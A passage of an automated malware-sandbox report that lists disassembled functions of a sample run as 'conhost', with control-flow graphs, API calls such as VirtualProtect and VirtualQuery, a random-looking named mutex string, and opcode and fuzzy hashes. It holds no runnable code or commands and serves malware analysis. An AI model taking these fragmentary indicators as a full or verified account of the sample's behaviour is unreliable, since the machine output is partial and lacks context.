140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000038.00000002.4158511665.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000038.00000002.4158485355.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158540031.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158565895.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158589415.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$wcscatwcscpywcsncmp
                                                                                • String ID: 0$X$\BaseNamedObjects\hbjhytnikyzzpqusaewfbxfq$`
                                                                                • API String ID: 597572034-531860705
                                                                                • Opcode ID: 1d427ba9be7d3ba3bec6229fbdbde9a9074d45dc578b1c22d95c1aa577c94588
                                                                                • Instruction ID: 7126976727d2455590f161184c1ef6fd40d1aee8864898634b8a3a6296fb7041
                                                                                • Opcode Fuzzy Hash: 1d427ba9be7d3ba3bec6229fbdbde9a9074d45dc578b1c22d95c1aa577c94588
                                                                                • Instruction Fuzzy Hash: EB1248B2618BC081E762CB16F8443EAB7A4F789794F814215EBA957BF5DF78C189C700
                                                                                Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000038.00000002.4158511665.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000038.00000002.4158485355.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158540031.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158565895.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158589415.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 2643109117-0
                                                                                • Opcode ID: 6d7ee7def3ecbc2315c845a9e895b93d75ddfd1a6bd6e3bc4d0ec8107381b6ea
                                                                                • Instruction ID: 8e9d9ccf9aa37448b00e8f279ba8024009d8511a4f997efa1032f1c394af1e30
                                                                                • Opcode Fuzzy Hash: 6d7ee7def3ecbc2315c845a9e895b93d75ddfd1a6bd6e3bc4d0ec8107381b6ea
                                                                                • Instruction Fuzzy Hash: E05122B1A01A4085FB16EF27F9947EA27A5BB8D7D0F849121FB4D873B6DE38C4958300
                                                                                Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 430 140001be9-140001bf1 428->430 431 140001c0c-140001c17 call 1400023b0 429->431 432 140001bf3-140001c02 430->432 433 140001be0-140001be7 430->433 438 140001cf4-140001cfe call 140001d40 431->438 439 140001c1d-140001c6c call 1400024d0 VirtualQuery 431->439 432->433 435 140001c04 432->435 433->430 433->431 437 140001cd7-140001cf3 memcpy 435->437 443 140001d03-140001d1e call 140001d40 438->443 439->443 445 140001c72-140001c79 439->445 446 140001d23-140001d38 GetLastError call 140001d40 443->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->437 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000038.00000002.4158511665.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000038.00000002.4158485355.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158540031.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158565895.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158589415.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: 827a20b0d9596d77dfdeb04b276488a729f23f40387757242716cefeeae07e70
                                                                                • Instruction ID: cf1e0d9f2b5a633c9964e53687c552e754ef6de65532a211d00188a72de6ab42
                                                                                • Opcode Fuzzy Hash: 827a20b0d9596d77dfdeb04b276488a729f23f40387757242716cefeeae07e70
                                                                                • Instruction Fuzzy Hash: 284132B1601A4586FA26DF47F884BE927A0E78DBC4F594126EF0E877B1DA38C586C700
                                                                                Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000038.00000002.4158511665.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000038.00000002.4158485355.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158540031.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158565895.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158589415.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 926137887-0
                                                                                • Opcode ID: 8a22b28b27b7d86677f45aa2b4efe2ee5acdb41b635d3ea5425600792096a756
                                                                                • Instruction ID: 91c440fe7cf303bba99da658d8c250480f431e45a9ff835d8bbbfd5805bc456d
                                                                                • Opcode Fuzzy Hash: 8a22b28b27b7d86677f45aa2b4efe2ee5acdb41b635d3ea5425600792096a756
                                                                                • Instruction Fuzzy Hash: E521E0B1715A0292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DF7A8986C300
                                                                                Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 485 14000194d-140001954 482->485 486 14000191e-140001929 482->486 484 140001943-140001947 483->484 483->485 484->485 487 140001a20-140001a26 484->487 488 140001956-140001961 485->488 489 14000199e-1400019a6 485->489 486->485 490 14000192b-14000193a 486->490 493 140001b87-140001b98 call 140001d40 487->493 494 140001a2c-140001a37 487->494 491 140001970-14000199c call 140001ba0 488->491 489->476 492 1400019a8-1400019c1 489->492 490->483 491->489 497 1400019df-1400019e7 492->497 494->489 498 140001a3d-140001a5f 494->498 502 1400019e9-140001a0d VirtualProtect 497->502 503 1400019d0-1400019dd 497->503 499 140001a7d-140001a97 498->499 504 140001b74-140001b82 call 140001d40 499->504 505 140001a9d-140001afa 499->505 502->503 503->476 503->497 504->493 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->489 516->499 517->513 518->504
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000038.00000002.4158511665.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000038.00000002.4158485355.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158540031.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158565895.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158589415.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                                                • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                                                • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                                                • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                                                Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 522 140001800-140001810 523 140001812-140001822 522->523 524 140001824 522->524 525 14000182b-140001867 call 140002290 fprintf 523->525 524->525
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000038.00000002.4158511665.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000038.00000002.4158485355.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158540031.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158565895.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158589415.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: 017cd526ac5081bc3907274b3a6367696541d9305a8f79609a5809f4e9dc966c
                                                                                • Instruction ID: 5f3fda99385e7d6d3bb1b8b50037b5b3929fa76f8f5eed77969f57ab4fd5d0ca
                                                                                • Opcode Fuzzy Hash: 017cd526ac5081bc3907274b3a6367696541d9305a8f79609a5809f4e9dc966c
                                                                                • Instruction Fuzzy Hash: 35F09671A14A4482E612EF6AB9417ED6360E75D7C1F50D221FF4D576A5DF3CD182C310
                                                                                Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 528 14000219e-1400021a5 529 140002272-140002280 528->529 530 1400021ab-1400021c2 EnterCriticalSection 528->530 531 140002265-14000226c LeaveCriticalSection 530->531 532 1400021c8-1400021d6 530->532 531->529 533 1400021e9-1400021f5 TlsGetValue GetLastError 532->533 534 1400021f7-1400021fa 533->534 535 1400021e0-1400021e7 533->535 534->535 536 1400021fc-140002209 534->536 535->531 535->533 536->535
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000038.00000002.4158511665.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000038.00000002.4158485355.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158540031.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158565895.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158589415.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                                                • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                                                • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                                                • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200